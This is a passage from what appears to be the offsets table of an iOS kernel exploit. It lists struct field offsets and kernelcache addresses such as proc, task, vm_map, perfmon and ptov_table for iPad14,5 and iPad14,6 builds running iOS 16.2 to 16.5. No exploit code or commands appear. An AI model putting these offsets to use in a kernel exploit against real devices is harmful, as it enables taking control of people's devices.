= 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa81288, .kernelcache__gPhysBase = 0xfffffe0007a8c100, .kernelcache__gPhysSize = 0xfffffe0007a8c100 + 8, .kernelcache__gVirtBase = 0xfffffe0007a8a2d8, .kernelcache__perfmon_devices = 0xfffffe000aabf520, .kernelcache__perfmon_dev_open = 0xfffffe00080d9214, .kernelcache__ptov_table = 0xfffffe00079d7180, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aabe990, .kernelcache__vm_pages = 0xfffffe00079d3ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079d6130, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aabe988, .kernelcache__vn_kqfilter = 0xfffffe0008125d84, }, // iPad Pro 11 4th // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:34 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8112", .build_version = "20C65", .device_id = "iPad14,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a989190, .kernelcache__gPhysBase = 0xfffffe00079a80c8, .kernelcache__gPhysSize = 0xfffffe00079a80c8 + 8, .kernelcache__gVirtBase = 0xfffffe00079a62a8, .kernelcache__perfmon_devices = 0xfffffe000a9c43b0, .kernelcache__perfmon_dev_open = 0xfffffe00080bcdd0, .kernelcache__ptov_table = 0xfffffe00078f3370, .kernelcache__vm_first_phys_ppnum = 0xfffffe000a9c3800, .kernelcache__vm_pages = 0xfffffe00078f0098, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078f2330, .kernelcache__vm_page_array_ending_addr = 0xfffffe000a9c37f8, .kernelcache__vn_kqfilter = 0xfffffe000810cdf8, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:23:25 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8112", .build_version = "20D47", .device_id = "iPad14,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a99d190, .kernelcache__gPhysBase = 0xfffffe00079a81b0, .kernelcache__gPhysSize = 0xfffffe00079a81b0 + 8, .kernelcache__gVirtBase = 0xfffffe00079a6390, .kernelcache__perfmon_devices = 0xfffffe000a9d83b0, .kernelcache__perfmon_dev_open = 0xfffffe00080bcc60, .kernelcache__ptov_table = 0xfffffe00078f33b0, .kernelcache__vm_first_phys_ppnum = 0xfffffe000a9d7800, .kernelcache__vm_pages = 0xfffffe00078f00d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078f2370, .kernelcache__vm_page_array_ending_addr = 0xfffffe000a9d77f8, .kernelcache__vn_kqfilter = 0xfffffe000810cc88, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:23:25 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8112", .build_version = "20D67", .device_id = "iPad14,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a99d190, .kernelcache__gPhysBase = 0xfffffe00079a81b0, .kernelcache__gPhysSize = 0xfffffe00079a81b0 + 8, .kernelcache__gVirtBase = 0xfffffe00079a6390, .kernelcache__perfmon_devices = 0xfffffe000a9d83b0, .kernelcache__perfmon_dev_open = 0xfffffe00080bcc60, .kernelcache__ptov_table = 0xfffffe00078f33b0, .kernelcache__vm_first_phys_ppnum = 0xfffffe000a9d7800, .kernelcache__vm_pages = 0xfffffe00078f00d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078f2370, .kernelcache__vm_page_array_ending_addr = 0xfffffe000a9d77f8, .kernelcache__vn_kqfilter = 0xfffffe000810cc88, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:28 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8112", .build_version = "20E246", .device_id = "iPad14,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa75208, .kernelcache__gPhysBase = 0xfffffe0007a87fc0, .kernelcache__gPhysSize = 0xfffffe0007a87fc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a86198, .kernelcache__perfmon_devices = 0xfffffe000aab3520, .kernelcache__perfmon_dev_open = 0xfffffe00080d4fa4, .kernelcache__ptov_table = 0xfffffe00079d3180, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aab2990, .kernelcache__vm_pages = 0xfffffe00079cfec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079d2130, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aab2988, .kernelcache__vn_kqfilter = 0xfffffe000812187c, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:28 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8112", .build_version = "20E252", .device_id = "iPad14,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa75208, .kernelcache__gPhysBase = 0xfffffe0007a87fc0, .kernelcache__gPhysSize = 0xfffffe0007a87fc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a86198, .kernelcache__perfmon_devices = 0xfffffe000aab3520, .kernelcache__perfmon_dev_open = 0xfffffe00080d4fa4, .kernelcache__ptov_table = 0xfffffe00079d3180, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aab2990, .kernelcache__vm_pages = 0xfffffe00079cfec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079d2130, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aab2988, .kernelcache__vn_kqfilter = 0xfffffe000812187c, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:08:36 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8112", .build_version = "20F66", .device_id = "iPad14,5", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa81288, .kernelcache__gPhysBase = 0xfffffe0007a8c100, .kernelcache__gPhysSize = 0xfffffe0007a8c100 + 8, .kernelcache__gVirtBase = 0xfffffe0007a8a2d8, .kernelcache__perfmon_devices = 0xfffffe000aabf520, .kernelcache__perfmon_dev_open = 0xfffffe00080d9214, .kernelcache__ptov_table = 0xfffffe00079d7180, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aabe990, .kernelcache__vm_pages = 0xfffffe00079d3ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079d6130, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aabe988, .kernelcache__vn_kqfilter = 0xfffffe0008125d84, }, // iPad Pro 11 4th // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:34 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8112", .build_version = "20C65", .device_id = "iPad14,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a989190, .kernelcache__gPhysBase = 0xfffffe00079a80c8, .kernelcache__gPhysSize = 0xfffffe00079a80c8 + 8, .kernelcache__gVirtBase = 0xfffffe00079a62a8, .kernelcache__perfmon_devices = 0xfffffe000a9c43b0, .kernelcache__perfmon_dev_open = 0xfffffe00080bcdd0, .kernelcache__ptov_table = 0xfffffe00078f3370, .kernelcache__vm_first_phys_ppnum = 0xfffffe000a9c3800, .kernelcache__vm_pages = 0xfffffe00078f0098, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078f2330, .kernelcache__vm_page_array_ending_addr = 0xfffffe000a9c37f8, .kernelcache__vn_kqfilter = 0xfffffe000810cdf8, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:23:25 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8112", .build_version = "20D47", .device_id = "iPad14,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a99d190, .kernelcache__gPhysBase = 0xfffffe00079a81b0, .kernelcache__gPhysSize = 0xfffffe00079a81b0 + 8, .kernelcache__gVirtBase = 0xfffffe00079a6390, .kernelcache__perfmon_devices = 0xfffffe000a9d83b0, .kernelcache__perfmon_dev_open = 0xfffffe00080bcc60, .kernelcache__ptov_table = 0xfffffe00078f33b0, .kernelcache__vm_first_phys_ppnum = 0xfffffe000a9d7800, .kernelcache__vm_pages = 0xfffffe00078f00d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078f2370, .kernelcache__vm_page_array_ending_addr = 0xfffffe000a9d77f8, .kernelcache__vn_kqfilter = 0xfffffe000810cc88, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:23:25 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8112", .build_version = "20D67", .device_id = "iPad14,6", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, 